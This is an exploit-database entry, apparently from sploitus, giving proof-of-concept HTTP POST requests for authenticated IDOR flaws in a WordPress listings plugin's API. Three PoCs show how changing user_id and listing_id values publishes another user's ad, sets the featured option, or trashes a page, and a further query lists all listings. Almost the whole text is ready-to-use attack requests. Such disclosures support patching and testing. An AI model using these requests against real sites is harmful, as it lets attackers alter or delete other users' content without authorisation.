## https://sploitus.com/exploit?id=WPEX-ID:0DED523A-3C12-4F5F-89D7-6A24F0CE5D6A
Important: user_id and listing_id values โโare dependent on each other, that is, if the author ID == 4, the data can only be modified for those ADs and pages that relate to this particular ID. You can find out the author of the AD/page/post and his ID, f.e., from the source code of the AD page or via API.
Get all custom ADs via API: https://example.com/1/api/my-listing/list?status=all&user_id=-1&query_var[]=&listing_type=-1&pagination_settings[maxPagesToShow]=-1
PoC #1 | Authenticated IDOR | Publish AD:
POST /1/api/ulisting-user/draft_or_delete HTTP/2
Host: example.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
{"user_id":262,"listing_id":"904","status":"publish",
"nonce":"23dfa4aa88"}
PoC #2 | Authenticated IDOR | Featured option:
POST /1/api/ulisting-listing/set-feature HTTP/2
Host: example.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
{"listing_id":"904","plan_id":true}
PoC #3 | Authenticated IDOR | Delete page:
POST /1/api/ulisting-user/draft_or_delete HTTP/2
Host: example.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 71
{"user_id":0,"listing_id":"2","status":"trash",
"nonce":"23dfa4aa88"}